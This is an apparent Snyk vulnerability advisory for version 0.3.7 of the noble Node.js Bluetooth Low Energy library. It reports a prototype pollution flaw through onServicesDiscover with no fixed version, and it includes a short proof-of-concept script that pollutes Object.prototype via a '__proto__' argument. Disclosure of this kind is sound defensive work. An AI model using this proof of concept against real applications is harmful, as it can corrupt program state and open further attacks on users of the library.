noble@0.3.7 vulnerabilities

A Node.js BLE (Bluetooth Low Energy) central library.

Direct Vulnerabilities

Known vulnerabilities in the noble package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free
VulnerabilityVulnerable Version
  • M
Prototype Pollution

noble is an A Node.js BLE (Bluetooth Low Energy) central library.

Affected versions of this package are vulnerable to Prototype Pollution via onServicesDiscover. NOTE: This is proven to work using a local payload, however it is likely to also allow exploits through Bluetooth.

###PoC:

var noble = require('noble');
//noble.emit("servicesDiscover");
console.log({}.x);
try {
    noble.onServicesDiscover("__proto__", "x");
} catch(e) {}
console.log({}.x);

How to fix Prototype Pollution?

There is no fixed version for noble.

*